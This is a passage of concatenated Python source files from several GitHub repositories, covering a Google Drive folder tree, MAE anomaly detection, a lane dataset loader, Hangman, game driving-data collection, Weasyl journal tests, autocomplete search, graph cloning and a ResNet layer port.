mimeType, md5Checksum)'\n result = self.service.files().list(q=query,\\\n fields=fields,\\\n pageToken=pageToken,\\\n pageSize=1000).execute()\n folders_metadata += result.get('files', [])\n pageToken = result.get('nextPageToken')\n if not pageToken:\n break\n # =========== real code ===========\n # just the folders vector, will be converted to a hash below\n folders = [f for f in folders_metadata\\\n if 'parents' in f]\n self.root.children = [] # empty tree\n 
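# The loop below attaches each folder to its parent bottom-up: a folder\n # whose parent is not yet in the tree is pushed onto the stack until an\n # ancestor already hanging off the root is found, then the stack is\n # unwound, creating one DriveFile node per entry.\n 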
stack = [] # [metadata]\n self.folders_hash = {}\n i = 0 # used to pin the node that is looking for a parent\n j = 0 # used to pin the next node that will look for the parent\n while folders or stack:\n enqueue = None\n j = 0\n for folder in folders:\n if folders[i]['parents'][0] == folder['id']:\n enqueue = folders[i]\n break\n j += 1\n\n if enqueue:\n stack.append(enqueue)\n folders.pop(i)\n if j < i:\n i = j\n else:\n i = j - 1\n elif folders[i]['parents'][0] == self.root.get_id():\n title = ('/' + folders[i]['name'] + '/')\n if (blacklist and title in blacklist)\\\n or (whitelist and not any(title in elem for elem in whitelist)):\n stack = []\n folders.pop(i)\n i = 0\n continue\n child = DriveFile(self.root, folders[i])\n self.folders_hash[folders[i]['id']] = child\n\n while stack:\n item = stack.pop()\n title = title + '/' + item['name'] + '/'\n if (blacklist and (title in blacklist)) \\\n or (whitelist and not \\\n any(elem in title for elem in whitelist)):\n stack = []\n break\n parent = child\n child = DriveFile(parent, item)\n self.folders_hash[item['id']] = child\n folders.pop(i)\n i = 0\n else:\n parent_id = folders[i]['parents'][0]\n if not parent_id in self.folders_hash:\n stack = []\n folders.pop(i)\n i = 0\n continue\n elif filter_enabled:\n title = self.folders_hash[parent_id].get_path() + folders[i]['name'] + '/'\n if (blacklist and (title in blacklist))\\\n or (whitelist and not\\\n any(elem in title for elem in whitelist)):\n stack = []\n folders.pop(i)\n i = 0\n continue\n\n child = DriveFile(self.folders_hash[parent_id], folders[i])\n self.folders_hash[child.get_id()] = child\n while stack:\n parent = child\n item = stack.pop()\n if (blacklist and (title in blacklist))\\\n or (whitelist and not \\\n any(elem in title for elem in whitelist)):\n stack = []\n break\n child = DriveFile(parent, item)\n self.folders_hash[item['id']] = child\n folders.pop(i)\n i = 0\n if complete:\n if self.folders_hash:\n parents_query = ['mimeType != \\'%s\\' and (\"%s\" in parents'\n % (TYPES['folder'], list(self.folders_hash)[0])]\n i = 0 # counter\n j = 0 # index of the list\n for item in list(self.folders_hash)[1:]:\n adding = '\"%s\" in parents' % item\n # 30000 is the max body size before too complex query\n if len(' or ' + parents_query[j]) >= 25000:\n parents_query[j] += ')'\n j += 1\n i = 0\n parents_query.append('mimeType != \\'%s\\' and (\"%s\" in parents'\n % (TYPES['folder'], item))\n continue\n parents_query[j] += ' or ' + adding\n i += 1\n parents_query[j] += ')'\n else:\n print('no folders found')\n return()\n fields = 'nextPageToken, files(name, id, parents, mimeType, md5Checksum)'\n pageTokens = [None] * len(parents_query)\n files_metadata = []\n while True:\n for i, query in enumerate(parents_query):\n if pageTokens[i] != '0':\n result = self.service.files().list(q=query,\\\n fields=fields,\\\n pageToken=pageTokens[i],\\\n pageSize=1000).execute()\n files_metadata += result.get('files', [])\n pageTokens[i] = result.get('nextPageToken')\n if not pageTokens[i]:\n pageTokens[i] = '0'\n if all(token == '0' for token in pageTokens):\n break\n\n for metadata in files_metadata:\n if not metadata['parents'][0] == self.root.get_id():\n parent = self.folders_hash[metadata['parents'][0]]\n else:\n if filter_enabled:\n continue\n parent = self.root\n self.files_hash[metadata['id']] = DriveFile(parent, metadata)\n\n def load_from_file(self, file_path=None):\n '''Loads the tree from disk'''\n if not file_path:\n file_path = self.save_path\n\n if os.path.exists(file_path) and 
os.path.isfile(file_path):\n with open(file_path, 'rb') as f:\n return pickle.load(f)\n return self\n\n def print_folder(self, folder, level=0, depth=None):\n '''Prints the folder recursively'''\n if depth and level == depth:\n return\n prefix = level * (' |') + '--'\n sequence = ''\n if folder.get_sequence():\n sequence = ' (' + str(folder.get_sequence()) + ')'\n print(prefix, folder.get_name(), sequence, '\\tid:', folder.get_id(), sep='')\n for child in folder.get_children():\n self.print_folder(child, level=level+1, depth=depth)\n\n def print_tree(self):\n self.print_folder(self.root)\n\n def remove_folder(self, id):\n folder = self.find_file(id)\n if folder:\n folder.get_parent().removeChildren(folder)\n\n def save_to_file(self, file_path=None):\n '''Saves the tree to disk'''\n if not file_path:\n file_path = self.save_path\n if not os.path.exists(os.path.split(os.path.abspath(file_path))[0]):\n os.makedirs(os.path.split(os.path.abspath(file_path))[0])\n\n with open(file_path, 'wb') as f:\n pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)\n f.flush()\n","repo_name":"lucasjrt/JRTDriveSync","sub_path":"drive_tree.py","file_name":"drive_tree.py","file_ext":"py","file_size_in_byte":14578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24390430355","text":"import os\nfrom types import MethodType\nfrom PIL import Image\nimport numpy as np\nimport time\n\nfrom mae_visualize_modified import (\n imagenet_normalize,\n per_patch_loss,\n masking_from_mask,\n patchify_mask,\n prepare_model,\n prepare_model_dummy,\n run_one_image,\n)\n\n# if you need to access a file next to the source code, use the variable ROOT\n# for example:\n# torch.load(os.path.join(ROOT, 'weights.pth'))\nROOT = os.path.dirname(os.path.realpath(__file__))\n\n\ndef minmaxnorm(x):\n return (x - x.min()) / (x.max() - x.min())\n\n\ndef tic_tac_toe_masks():\n mask0, mask1, mask2, mask3 = np.zeros((4, 224, 224, 1))\n for i in range(14):\n for j in range(14):\n if i % 2 == 0 and j % 2 == 0:\n mask0[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n elif i % 2 == 0 and j % 2 == 1:\n mask1[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n elif i % 2 == 1 and j % 2 == 0:\n mask2[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n elif i % 2 == 1 and j % 2 == 1:\n mask3[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n return mask0, mask1, mask2, mask3\n\n\ndef detect_anomaly(img_path, loss):\n \"\"\"Detects anomalies by measuring the difference between the original and reconstructed image.\"\"\"\n img, size = load_img(img_path)\n tictactoemasks = tic_tac_toe_masks()\n model_mae = get_model_mae(loss)\n reconstruction, losses = [], []\n for i, mask in enumerate(tictactoemasks):\n (\n original,\n masked,\n reconstruction_m,\n reconstructionplusvisible,\n size,\n loss_per_patch,\n vector_mask,\n ) = reconstruct_mask(img, mask, model_mae, size)\n reconstruction.append(reconstruction_m * mask)\n losses.append((loss_per_patch * vector_mask).detach().numpy())\n reconstruction = np.array(reconstruction).sum(0)\n losses = np.array(losses).sum(0).reshape(14, 14)\n return original, reconstruction, losses, size\n\n\ndef load_img(img_path):\n img = Image.open(img_path).convert(\"RGB\")\n size = img.size\n img = np.array(img.resize((224, 224))) / 255.0\n assert img.shape == (\n 224,\n 224,\n 3,\n ), f\"Expected image to be (224, 224, 3) instead of {img.shape}\"\n img = imagenet_normalize(img)\n return img, size\n\n\ndef load_mask(mask_path):\n mask = (\n 
np.array(Image.open(mask_path).resize((224, 224), Image.NEAREST))[\n ..., -1\n ]\n > 0\n ).astype(bool)[..., None]\n assert mask.shape == (\n 224,\n 224,\n 1,\n ), f\"Expected mask to be (224, 224, 1) instead of {mask.shape}\"\n return mask\n\n\ndef reconstruct_mask0(img_path, loss):\n \"\"\"Runs MAE model with given loss over `input` image using `mask_0.png` as the part to ignore.\"\"\"\n img, size = load_img(img_path)\n mask = load_mask(os.path.join(ROOT, \"mask_0.png\"))\n model_mae = get_model_mae(loss)\n return reconstruct_mask(img, mask, model_mae, size)\n\n\ndef get_model_mae(loss):\n st = time.time()\n mse_ckpt = os.path.join(ROOT, \"mae_visualize_vit_large.pth\")\n gan_ckpt = os.path.join(ROOT, \"mae_visualize_vit_large_ganloss.pth\")\n if loss == \"MSE\" and os.path.exists(mse_ckpt):\n model_mae = prepare_model(mse_ckpt, \"mae_vit_large_patch16\")\n elif loss == \"GAN\" and os.path.exists(gan_ckpt):\n model_mae = prepare_model(gan_ckpt, \"mae_vit_large_patch16\")\n else:\n print(\"No model found for loss type \" + loss)\n print(f\"Directory contains: {os.listdir(ROOT)}\")\n print(\"Loading model with random weights\")\n model_mae = prepare_model_dummy(\"mae_vit_large_patch16\")\n\n model_mae.patchify_mask = MethodType(patchify_mask, model_mae)\n model_mae.random_masking = MethodType(masking_from_mask, model_mae)\n model_mae.forward_loss = MethodType(per_patch_loss, model_mae)\n print(f\"Model loaded in {time.time()-st}s.\")\n return model_mae\n\n\ndef reconstruct_mask(img, mask, model_mae, size):\n st = time.time()\n (\n original,\n masked,\n reconstruction,\n reconstructionplusvisible,\n loss_per_patch,\n vector_mask,\n ) = run_one_image(img, mask, model_mae)\n print(\"Reconstruction done in \" + str(time.time() - st) + \"s.\")\n return (\n original,\n masked,\n reconstruction,\n reconstructionplusvisible,\n size,\n loss_per_patch,\n vector_mask,\n )\n\n\ndef save_outputs(size, **kwargs):\n for k, v in kwargs.items():\n Image.fromarray(v).resize(size).save(f\"{k}.png\")\n Image.fromarray(v).save(f\"{k}rs.png\")\n\n\ndef main_reconstruct(img_path, loss):\n\n (\n original,\n masked,\n reconstruction,\n reconstructionplusvisible,\n size,\n loss_per_patch,\n vector_mask,\n ) = reconstruct_mask0(img_path, loss)\n save_outputs(\n size=size,\n original=original,\n masked=masked,\n reconstruction=reconstruction,\n reconstructionplusvisible=reconstructionplusvisible,\n )\n\n\ndef main_anomaly(img_path, loss):\n original, reconstruction, losses, size = detect_anomaly(img_path, loss)\n save_outputs(\n size=size,\n original=original,\n reconstruction=reconstruction.astype(np.uint8),\n error=(minmaxnorm(losses) * 255).astype(np.uint8),\n )\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input\", type=str, required=True)\n parser.add_argument(\"--loss\", type=str, required=True)\n\n args = parser.parse_args()\n main_anomaly(args.input, args.loss)\n","repo_name":"franchesoni/mae_anomaly_detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"12702006411","text":"#!/usr/bin/env python\n# coding: utf-8\n# @author: Zhijian Qiao\n# @email: zqiaoac@connect.ust.hk\n\nimport os\nimport cv2\nimport numpy as np\nimport json\nimport glob\nfrom misc.config import cfg\n\n\nclass OpenLane:\n\n def __init__(self, args, segment, dataset = None):\n self.dataset = dataset\n self.data_dir = 
cfg.dataset.label_dir\n self.dataset_dir = cfg.dataset.image_dir\n self.segment = segment\n self.timestamp_micros_list = self.load_data()\n\n def load_data(self):\n segment_dir = os.path.join(self.data_dir, 'training', self.segment)\n json_files = sorted(glob.glob(os.path.join(segment_dir, '*.json')))\n timestamp_micros_list = [int(os.path.basename(json_file).replace('00.json', '.json').split('.')[0]) for json_file in json_files]\n return timestamp_micros_list\n\n def __len__(self):\n return len(self.timestamp_micros_list)\n\n def fetch_gt_data(self, timestamp_micros, return_image = False):\n gt_json = os.path.join(self.data_dir, 'training', self.segment, '{:<018}.json'.format(timestamp_micros))\n with open(gt_json, 'r') as fp:\n gt_dict = json.load(fp)\n\n if return_image:\n image_path = os.path.join(self.dataset_dir, gt_dict['file_path'])\n img = cv2.imread(image_path)\n else:\n img = None\n\n vehicle_pose = np.array(gt_dict['pose'])\n ex0 = np.array(gt_dict['extrinsic'])\n cam0_pose = vehicle_pose @ ex0\n\n lane_all = []\n for lane in gt_dict['lane_lines']:\n xyz = np.asarray(lane['xyz']).reshape(3, -1).T\n if xyz.shape[0] == 0:\n continue\n category = np.asarray(lane['category']).reshape(-1, 1).repeat(xyz.shape[0], axis=0)\n visibility = np.asarray(lane['visibility']).reshape(-1, 1)\n track_id = np.asarray(lane['track_id']).reshape(-1, 1).repeat(xyz.shape[0], axis=0)\n points = np.concatenate([xyz, category, visibility, track_id], axis=1)\n lane_all.append(points)\n\n if len(lane_all) > 0:\n lane_points = np.vstack(lane_all)\n else:\n lane_points = None\n\n return img, lane_points, cam0_pose\n\n def fetch_data(self, timestamp):\n idx_json_file = os.path.join(self.data_dir, 'training', self.segment, '{:<018}.json'.format(timestamp))\n idx = self.dataset._label_list.index(idx_json_file)\n\n idx_json_file, image, seg_label, gt_anchor, gt_laneline_img, idx, gt_cam_height, \\\n gt_cam_pitch, intrinsics, extrinsics, aug_mat, seg_name, seg_bev_map = self.dataset.WIP__getitem__(idx)\n\n data_dict = {\n 'idx_json_file': idx_json_file,\n 'image': image.unsqueeze(0),\n 'seg_label': seg_label.unsqueeze(0),\n 'gt_anchor': gt_anchor.unsqueeze(0),\n 'gt_laneline_img': gt_laneline_img.unsqueeze(0),\n 'idx': idx,\n 'gt_cam_height': gt_cam_height.unsqueeze(0),\n 'gt_cam_pitch': gt_cam_pitch.unsqueeze(0),\n 'intrinsics': intrinsics.unsqueeze(0),\n 'extrinsics': extrinsics.unsqueeze(0),\n 'aug_mat': aug_mat.unsqueeze(0),\n 'seg_name': seg_name,\n 'seg_bev_map': seg_bev_map.unsqueeze(0)\n }\n\n return data_dict","repo_name":"HKUST-Aerial-Robotics/MonoLaneMapping","sub_path":"lane_slam/openlane.py","file_name":"openlane.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"50"} +{"seq_id":"39855329092","text":"import random\r\n\r\nclass Hangman:\r\n    def __init__(self, word):\r\n        self.word = word\r\n        self.possible_words = ['becode', 'learning', 'mathematics', 'sessions', 'just', 'trust', 'pedagogy']\r\n        self.word_to_find = []\r\n        self.lives = 5\r\n        self.correctly_guessed_letters = []\r\n        self.wrongly_guessed_letters = []\r\n        self.turn_count = 0\r\n        self.error_count = 0\r\n\r\n\r\n    def play(self):\r\n        letter = input('please enter a letter')\r\n        if letter in self.word_to_find:\r\n            for index, l in enumerate(self.word_to_find):\r\n                if l == letter:\r\n                    self.correctly_guessed_letters[index] = letter\r\n            print(self.correctly_guessed_letters)\r\n        else:\r\n            self.wrongly_guessed_letters.append(letter)\r\n            self.error_count += 1\r\n            self.lives -= 1\r\n        self.turn_count += 1\r\n\r\n    def start_game(self):\r\n        word = random.choice(self.possible_words)\r\n        self.word_to_find = list(word)\r\n        self.correctly_guessed_letters = ['_'] * len(self.word_to_find)\r\n        while True:\r\n            self.play()\r\n            if self.lives == 0:\r\n                self.game_over()\r\n                break\r\n            if self.word_to_find == self.correctly_guessed_letters:\r\n                self.well_played()\r\n                break\r\n\r\n    def game_over(self):\r\n        print(\"Gameover\")\r\n\r\n    def well_played(self):\r\n        print(f\"You found the word: {''.join(self.word_to_find)} in {self.turn_count} turns with {self.error_count} errors!\")\r\n\r\n\r\n","repo_name":"Helabrak/Hangman","sub_path":"Hangman/utils/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5057731224","text":"import numpy as np\r\nfrom grabscreen import grab_screen\r\nimport cv2\r\nimport time\r\nfrom getkeys import key_check\r\nimport os\r\n\r\ndef keys_to_output(keys):\r\n output = [0,0,0]\r\n if 'A' in keys:\r\n output[0] = 1\r\n elif 'D' in keys:\r\n output[2] = 1 \r\n elif 'W' in keys:\r\n output[1] = 1\r\n return output\r\n\r\n\r\nfile_name = 'training_data.npy'\r\n\r\nif os.path.isfile(file_name):\r\n print('File exists, loading previous data')\r\n training_data = list(np.load(file_name, allow_pickle=True))\r\nelse:\r\n print('creating new')\r\n training_data = []\r\n\r\ndef main():\r\n for i in list(range(4)):\r\n print(i+1)\r\n time.sleep(1)\r\n while(True):\r\n screen = grab_screen(region = (0,40,800,640))\r\n lasttime = time.time()\r\n screen = cv2.cvtColor(screen , cv2.COLOR_BGR2GRAY)\r\n screen = cv2.resize(screen , (224,224))\r\n keys = key_check()\r\n output = keys_to_output(keys)\r\n training_data.append([screen,output])\r\n\r\n if cv2.waitKey(25) & 0xFF == ord('q'):\r\n cv2.destroyAllWindows()\r\n break\r\n if len(training_data)%500 ==0:\r\n print(len(training_data))\r\n np.save(file_name,training_data)\r\n\r\n\r\nmain()\r\n","repo_name":"satyadwyoom/gta-san-andreas","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73448251036","text":"from __future__ import absolute_import\n\nimport arrow\nimport pytest\n\nfrom libweasyl import ratings\nfrom libweasyl.models.helpers import CharSettings\nfrom weasyl.test import db_utils\n\n\n@pytest.fixture(name='journal_user')\n@pytest.mark.usefixtures('db')\ndef _journal_user():\n return db_utils.create_user(username='journal_test')\n\n\n@pytest.fixture(name='journals')\n@pytest.mark.usefixtures('db', 'journal_user')\ndef _journals(journal_user):\n db_utils.create_journal(journal_user, title=u'Test journal', unixtime=arrow.get(1), content=u'A test journal')\n db_utils.create_journal(journal_user, title=u'Public journal', unixtime=arrow.get(2), content=u'A public journal')\n db_utils.create_journal(journal_user, title=u'Hidden journal', unixtime=arrow.get(3), content=u'A hidden journal', settings=CharSettings({'hidden'}, {}, {}))\n db_utils.create_journal(journal_user, title=u'Restricted journal', rating=ratings.MATURE.code, unixtime=arrow.get(4), content=u'A journal with a non-General rating')\n db_utils.create_journal(journal_user, title=u'Recent journal', unixtime=arrow.get(5), content=u'The most recent journal', settings=CharSettings({'friends-only'}, {}, {}))\n\n\n@pytest.mark.usefixtures('db', 'journal_user')\ndef test_profile_empty(app):\n resp = app.get('/~journal_test')\n assert 
resp.html.find(id='user-journal') is None\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_profile_guest(app):\n resp = app.get('/~journal_test')\n assert resp.html.find(id='user-journal').h4.string == u'Public journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_profile_user(app):\n user = db_utils.create_user(config=CharSettings(frozenset(), {}, {'tagging-level': 'max-rating-mature'}))\n cookie = db_utils.create_session(user)\n\n resp = app.get('/~journal_test', headers={'Cookie': cookie})\n assert resp.html.find(id='user-journal').h4.string == u'Restricted journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_profile_friend(app, journal_user):\n user = db_utils.create_user()\n cookie = db_utils.create_session(user)\n db_utils.create_friendship(user, journal_user)\n\n resp = app.get('/~journal_test', headers={'Cookie': cookie})\n assert resp.html.find(id='user-journal').h4.string == u'Recent journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_list_guest(app):\n resp = app.get('/journals/journal_test')\n titles = [link.string for link in resp.html.find(id='journals-content').find_all('a')]\n assert titles == [u'Public journal', u'Test journal']\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'no_csrf')\ndef test_create(app, journal_user):\n cookie = db_utils.create_session(journal_user)\n\n app.post('/submit/journal', {'title': u'Created journal', 'rating': '10', 'content': u'A journal'}, headers={'Cookie': cookie})\n\n resp = app.get('/~journal_test')\n assert resp.html.find(id='user-journal').h4.string == u'Created journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user')\ndef test_csrf_on_journal_edit(app, journal_user):\n # Test purpose: Verify that a CSRF token is required to submit a journal entry.\n cookie = db_utils.create_session(journal_user)\n journalid = db_utils.create_journal(journal_user, \"Test\", content=\"Test\")\n\n resp = app.post(\n '/edit/journal',\n {'title': u'Created journal', 'rating': '10', 'content': u'A journal', 'journalid': journalid},\n headers={'Cookie': cookie},\n status=403,\n )\n assert resp.html.find(id='error_content').p.text.startswith(u\"This action appears to have been performed illegitimately\")\n\n\n@pytest.mark.usefixtures('db', 'journal_user')\ndef test_login_required_to_edit_journal(app, journal_user):\n # Test purpose: Verify that an active session is required to even attempt to edit a journal.\n journalid = db_utils.create_journal(journal_user, \"Test\", content=\"Test\")\n\n resp = app.post(\n '/edit/journal',\n {'title': u'Created journal', 'rating': '10', 'content': u'A journal', 'journalid': journalid},\n )\n assert \"You must be signed in to perform this operation.\" in resp.html.find(id='error_content').text\n","repo_name":"kfkitsune/wzl-test","sub_path":"weasyl/test/web/test_journals.py","file_name":"test_journals.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9701295387","text":"\"\"\"\nWhen the cutter height h is set, it cuts the lined-up rice cakes in one stroke.\nCakes taller than h lose the part above h; shorter cakes are not cut.\nWith cakes of 19, 14, 10, 17 and h=15, the cakes after cutting are\n15, 14, 10, 15, and the cut-off pieces are 4, 0, 0, 2.\nSo the customer can take home 6 in total.\n\nGiven a customer's requested length M, find the maximum height\nthat can be set on the cutter while still providing at least M of rice cake.\n\"\"\"\n\n#Input\n\"\"\"\nThe first line gives the number of rice cakes n and the length m.\nThe second line gives the individual heights.\n\"\"\"\n\n#Output\n\"\"\"\nPrint the maximum cutter height.\n\"\"\"\n\n#Idea\n\"\"\"\nBinary-search the range from 0 to the maximum cake height: for each midpoint,\nsum the lengths cut off at that height, and narrow the range until the\nheight yielding at least m is found.\n\"\"\"\n\n#Caution\n\"\"\"\n\"At least M of rice cake\" means a minimum of m;\nthat is, find the maximum height h whose cut total is m or more.\n\"\"\"\n\n\n\nn,m = map(int,input().split())\narr = list(map(int,input().split()))\n\ns=0\ne=max(arr)\n\nwhile s<=e:\n    mid=(s+e)//2\n    l=0\n    for i in arr:\n        if i>mid:\n            l+=i-mid\n    if l>=m:\n        s=mid+1\n        h=mid\n    else:\n        e=mid-1\nprint(h)","repo_name":"qkrtndh/coding_test_python","sub_path":"탐색/이진탐색/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37601805828","text":"from directed_graph import *\n\ndef clone_rec(root,graph,nodes_completed):\n if not root:\n return None\n \n # Creating new vertex/node\n pNew = Node(root.data)\n \n # Using hashmap to keep track of visited nodes\n nodes_completed[root] = pNew\n \n # Adding new vertex in the graph\n graph.add_vertex_in_nodes(pNew)\n \n # Iterate over each neighbor of the current vertex/node\n for p in root.neighbors:\n x = nodes_completed.get(p)\n if not x:\n # If node is not visited, call recursive function to create its clone\n pNew.neighbors.append(clone_rec(p,graph,nodes_completed))\n else:\n # If already visited, just add it to the neighbors of the current vertex\n pNew.neighbors.append(x)\n \n return pNew\n\ndef clone(graph):\n # Hashmap to keep record of visited nodes\n nodes_completed = {}\n\n # Creating new graph\n clone_graph = DirectedGraph()\n\n if not graph.nodes:\n return None\n else:\n clone_rec(graph.nodes[0], clone_graph, nodes_completed)\n\n # return deep copied graph\n return clone_graph\n\n\"\"\"\nSolution\n We use depth-first traversal and create a copy of each node while traversing the graph. \n To avoid getting stuck in cycles, we use a hashtable to store each visited node. And we\n do not revisit nodes that exist in the hashtable. The hashtable key is a node in the \n original graph and its value is the corresponding node in the cloned graph.\n\n For the above graph, let's assume the root is node 0. So, we'll start with 0.\n\n We will start our traversal from node 0\n We will create a new node 0 and add the\n entry (0,0') in the hashtable\n\n Now we'll move to the first neighbor of 0,\n node 2. We'll create a new node 2', and add\n entry (2,2') in hashtable. 2 has only one \n neighbor 0 which is already in hashtable,\n so it will be skipped in this step.\n\n Now we'll move on to the 2nd neighbor of node 0,\n node 3. We'll create a new node 3', and add\n entry (3,3') in hashtable. 3 has only one \n neighbor 2 which is already in hashtable, so it will\n be skipped in this step.\n\n Now we'll move on to the 3rd neighbor of node 0,\n node 4. We'll create a new node 4', and add \n entry (4,4') in hashtable. 4 has three neigh-\n -bors {0,1,3}. Nodes 0 and 3 are already in hashtable,\n so they will be skipped. However node 1 is still not \n in hashtable.\n\n Now we'll move to node 1 which is a neighbor of 4.\n We'll create a new node 1'. 
The only neighbor of this\n node is node 2, which is already in the hashtable.\n\nTime Complexity\n The time complexity of this solution is linear, O(N).\n\nSpace Complexity\n The space complexity of this solution is linear, O(N), where N is\n the number of vertices in the graph.\n\n **We can have at most N entries in the hash table, so the worst-case\n space complexity is O(N)**\n\n\"\"\"","repo_name":"RicardoTlatelpa/Algorithms-DataStructures","sub_path":"Educative/DataStructures/graphs/Challenges/CloneADG--solution.py","file_name":"CloneADG--solution.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30975138865","text":"# https://deeplearningcourses.com/c/advanced-computer-vision\n# https://www.udemy.com/advanced-computer-vision\nfrom __future__ import print_function, division\nfrom builtins import range, input\n# Note: you may need to update your version of future\n# sudo pip install -U future\n\n\n# Let's go up to the end of the first conv block\n# to make sure everything has been loaded correctly\n# compared to keras\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport keras\n\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.models import Model\nfrom keras.preprocessing import image\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\n\nfrom tf_resnet_convblock import ConvLayer, BatchNormLayer, ConvBlock\n\n\n# NOTE: dependent on your Keras version\n# this script used 2.1.1\n# resnet.layers[:17] is, in order:\n# [InputLayer,\n#  Conv2D (conv1), BatchNormalization, Activation, MaxPooling2D,\n#  then the first conv block: 3 x (Conv2D, BatchNormalization, Activation)\n#  plus the shortcut Conv2D + BatchNormalization, Add, Activation]\n\n\n# define some additional layers so they have a forward function\nclass ReLULayer:\n def forward(self, X):\n return tf.nn.relu(X)\n\n def get_params(self):\n return []\n\nclass MaxPoolLayer:\n def __init__(self, dim):\n self.dim = dim\n\n def forward(self, X):\n return tf.nn.max_pool(\n X,\n ksize=[1, self.dim, self.dim, 1],\n strides=[1, 2, 2, 1],\n padding='VALID'\n )\n\n def get_params(self):\n return []\n\nclass PartialResNet:\n def __init__(self):\n self.layers = [\n # before conv block\n ConvLayer(d=7, mi=3, mo=64, stride=2, padding='SAME'),\n BatchNormLayer(64),\n ReLULayer(),\n MaxPoolLayer(dim=3),\n # conv block\n ConvBlock(mi=64, fm_sizes=[64, 64, 256], stride=1),\n ]\n self.input_ = tf.placeholder(tf.float32, shape=(None, 224, 224, 3))\n self.output = self.forward(self.input_)\n\n def copyFromKerasLayers(self, layers):\n self.layers[0].copyFromKerasLayers(layers[1])\n self.layers[1].copyFromKerasLayers(layers[2])\n self.layers[4].copyFromKerasLayers(layers[5:])\n\n def forward(self, X):\n for layer in self.layers:\n X = layer.forward(X)\n return X\n\n def predict(self, X):\n assert(self.session is not None)\n return self.session.run(\n self.output,\n feed_dict={self.input_: X}\n )\n\n def set_session(self, session):\n self.session = session\n self.layers[0].session = session\n self.layers[1].session = session\n self.layers[4].set_session(session)\n\n def get_params(self):\n params = []\n for layer in self.layers:\n params += layer.get_params()\n return params\n\n\nif __name__ == '__main__':\n # you can also set weights to None, it doesn't matter\n resnet = ResNet50(weights='imagenet')\n\n # you can determine the correct layer\n # by looking at resnet.layers in the console\n partial_model = Model(\n inputs=resnet.input,\n outputs=resnet.layers[16].output\n )\n print(partial_model.summary())\n # for layer in partial_model.layers:\n # layer.trainable = False\n\n 
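# Build the hand-rolled TF re-implementation; its weights are copied over\n # from the Keras model further below before the two outputs are compared.\n 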
my_partial_resnet = PartialResNet()\n\n # make a fake image\n X = np.random.random((1, 224, 224, 3))\n\n # get keras output\n keras_output = partial_model.predict(X)\n\n # get my model output\n init = tf.variables_initializer(my_partial_resnet.get_params())\n\n # note: starting a new session messes up the Keras model\n session = keras.backend.get_session()\n my_partial_resnet.set_session(session)\n session.run(init)\n\n # first, just make sure we can get any output\n first_output = my_partial_resnet.predict(X)\n print(\"first_output.shape:\", first_output.shape)\n\n # copy params from Keras model\n my_partial_resnet.copyFromKerasLayers(partial_model.layers)\n\n # compare the 2 models\n output = my_partial_resnet.predict(X)\n diff = np.abs(output - keras_output).sum()\n if diff < 1e-10:\n print(\"Everything's great!\")\n else:\n print(\"diff = %s\" % diff)\n","repo_name":"lazyprogrammer/machine_learning_examples","sub_path":"cnn_class2/tf_resnet_first_layers.py","file_name":"tf_resnet_first_layers.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","stars":7794,"dataset":"github-code","pt":"52"} +{"seq_id":"10506175666","text":"from autoCompleteData import AutoCompleteData\nimport string\n\nword_dict = dict()\nfrom initialization import *\n\n\ndef intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\n\ndef completed_sentence_change_one_char(input):\n optional_sentence = []\n for i in range(len(input)):\n for char in string.ascii_lowercase:\n if input != input[:i] + char + input[i + 1:]:\n optional_sentence.append({\n 'word': input[:i] + char + input[i + 1:],\n 'index': i\n })\n return optional_sentence\n\n\ndef completed_sentence_delete_one_char(input):\n optional_sentence = []\n for i in range(len(input)):\n if input != (input[:i] + input[i + 1:]):\n optional_sentence.append({\n 'word': input[:i] + input[i + 1:],\n 'index': i\n })\n return optional_sentence\n\n\ndef completed_sentence_add_one_char(input):\n optional_sentence = []\n for i in range(len(input)):\n for char in string.ascii_lowercase:\n if input != input[:i] + char + input[i:]:\n optional_sentence.append({\n 'word': input[:i] + char + input[i:],\n 'index': i\n })\n return optional_sentence\n\n\ndef get_res_of_search(dict, searching, case):\n all_possible_src = []\n searching_words = searching['word'].split(' ')\n if len(searching_words) == 1:\n if dict.words_dict.get(searching_words[0]):\n src_arr = dict.words_trie.search(searching_words[0])\n return [AutoCompleteData(searching['word'], i, case, searching['index']) for i in src_arr]\n for i in 